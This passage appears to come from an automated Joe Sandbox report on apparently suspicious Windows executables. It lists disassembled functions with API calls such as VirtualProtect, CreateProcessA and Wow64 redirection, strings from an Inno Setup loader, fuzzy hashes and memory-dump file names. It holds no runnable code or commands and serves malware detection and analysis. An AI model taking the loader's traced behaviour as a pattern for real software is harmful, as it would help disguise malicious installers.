Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303f394a3067269b5d9c5d9a82de1698a4126f6c241564d8d21bda695d7fabe2
Instruction ID: ef48882e841f6bebab8ece2cb9130c37d36fd0d616359ec6848cd9a6d7848e2c
Opcode Fuzzy Hash: 303f394a3067269b5d9c5d9a82de1698a4126f6c241564d8d21bda695d7fabe2
Instruction Fuzzy Hash: B7023CB1A0425ADBDB18DF5CD941A6DB7B3FF88304F2481B9D601AB785C635AF02DB44

Function 006A31F0 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21316ba787f08a357b2b35ea35135542307de81a03343d06200decb50a1cdcad
Instruction ID: 1b2d87bbf988dc9bba2a0307ae1d023c31bfa5cd3a236de5ed4963a31f3f7583
Opcode Fuzzy Hash: 21316ba787f08a357b2b35ea35135542307de81a03343d06200decb50a1cdcad
Instruction Fuzzy Hash: BCF12B7190425ADBEB18DF58D9507ADB7B3FF88304F2481B9D602AB785C635AF02DB44

Function 006A2F80 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1dfefcfae00a5c81b8870e99ca25082a1c61761d74ec5a7e9704fd00836afc8
Instruction ID: 08f819f0963b662a34655dd07f6a7009cf7bdab0d9c153eac7e9f1ea97b15e02
Opcode Fuzzy Hash: f1dfefcfae00a5c81b8870e99ca25082a1c61761d74ec5a7e9704fd00836afc8
Instruction Fuzzy Hash: 1A710F70114189AFDB08DF29C891AAA7BA2FF89354F14C16DFD198F385C239EA51DF84

Function 006B69E0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006B6A17
___except_validate_context_record.LIBVCRUNTIME ref: 006B6A1F
_ValidateLocalCookies.LIBCMT ref: 006B6AA8
__IsNonwritableInCurrentImage.LIBCMT ref: 006B6AD3
_ValidateLocalCookies.LIBCMT ref: 006B6B28

Strings

csm, xrefs: 006B6ABD
{Ik, xrefs: 006B6AC5, 006B6ACE, 006B6ADF

Memory Dump Source

Source File: 00000007.00000002.3350838650.0000000000671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true

Associated: 00000007.00000002.3350673698.0000000000670000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351255834.00000000006DF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351446597.00000000006E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351600300.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351755588.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.00000000006FA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3351938672.000000000072F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354243463.0000000000758000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354480591.000000000075A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A41000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A4F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A59000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A61000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A6E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A75000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A80000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A84000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A8C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000A92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354901045.0000000000AF9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3368193614.0000000000CF2000.00000020.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_670000_IVTULQzdBmF3Bc0NeoxSnYvg.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm${Ik
API String ID: 1170836740-563533248
Opcode ID: 4214e3fdfd872a301d3d6038effadf737f36983d59ac26638b9274c922b0b094
Instruction ID: 4ccba3a6e3f109af42c5e12572d18ebac3877b8e6bee56268c9a2a6155866b48
Opcode Fuzzy Hash: 4214e3fdfd872a301d3d6038effadf737f36983d59ac26638b9274c922b0b094
Instruction Fuzzy Hash: 5351C2B0A002489FCF10DF68C881AEE7BB7EF45314F148099F905AB352D736DA95CB91

Analysis Process: H1pBxuA3W1wJGbhYT2DZXaLH.exePID: 1756, Parent PID: 5720COMMON

Execution Graph

Execution Coverage:	21.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	1513
Total number of Limit Nodes:	21

Executed Functions

Function 00409A14 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409A26
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59

Function 0040515C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED

Function 00408FC8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008

Strings

Wow64DisableWow64FsRedirection, xrefs: 00408FDE
kernel32.dll, xrefs: 00408FE3, 00408FFD
shell32.dll, xrefs: 00409034
Wow64RevertWow64FsRedirection, xrefs: 00408FF8

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E

Function 00409FB4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
SetWindowLongA.USER32(00070066,000000FC,004097FC), ref: 0040A027

Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4

Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974,00000000,0040995B), ref: 004098F8
Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974,00000000), ref: 0040990C
Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974), ref: 00409940

RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
73EA5CF0.USER32(00070066,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127

Strings

/SL5="$%x,%d,%d,, xrefs: 0040A067
STATIC, xrefs: 0040A009
InnoSetupLdrWindow, xrefs: 0040A004

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 978128352-3001827809
Opcode ID: 9c8ea10fba0bacef7ee7554f484bbf0083ac014c195cd591b4e6d4161ca4494d
Instruction ID: 2aab8d6a1107d59a0dbd69bd519f9aeeb599bbf5838cf4a6d23b975b9c0419da
Opcode Fuzzy Hash: 9c8ea10fba0bacef7ee7554f484bbf0083ac014c195cd591b4e6d4161ca4494d
Instruction Fuzzy Hash: 82411A70600205DFD714EBA9EE85B9A37A5EB84304F10827BF510B73E2DB799801CB9D

Function 00409FD8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02001698), ref: 00409484

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
SetWindowLongA.USER32(00070066,000000FC,004097FC), ref: 0040A027

Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4

Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974,00000000,0040995B), ref: 004098F8
Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974,00000000), ref: 0040990C
Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974), ref: 00409940

RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
73EA5CF0.USER32(00070066,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127

Strings

/SL5="$%x,%d,%d,, xrefs: 0040A067
STATIC, xrefs: 0040A009
InnoSetupLdrWindow, xrefs: 0040A004

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 240127915-3001827809
Opcode ID: 62d8dbe4b1c3dad8fb4edccf749c2621fd87208e12f798d5229e62a67d41b466
Instruction ID: c704a2ad47ec1817622344a3babb652a96bc0d7367c7d7960b287e1564feeaf5
Opcode Fuzzy Hash: 62d8dbe4b1c3dad8fb4edccf749c2621fd87208e12f798d5229e62a67d41b466
Instruction Fuzzy Hash: DD41FA70A00205DFD714EBA9EE85B9A37A5EB44304F10827BF510B73E2DB799805CB9D

Function 00409888 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974,00000000,0040995B), ref: 004098F8
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974,00000000), ref: 0040990C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02001698,00409974), ref: 00409940

Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02001698), ref: 00409484

Strings

D, xrefs: 004098D2

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669

Function 00409D26 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A

Strings

.tmp, xrefs: 00409DD0
$u@, xrefs: 00409E3E

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
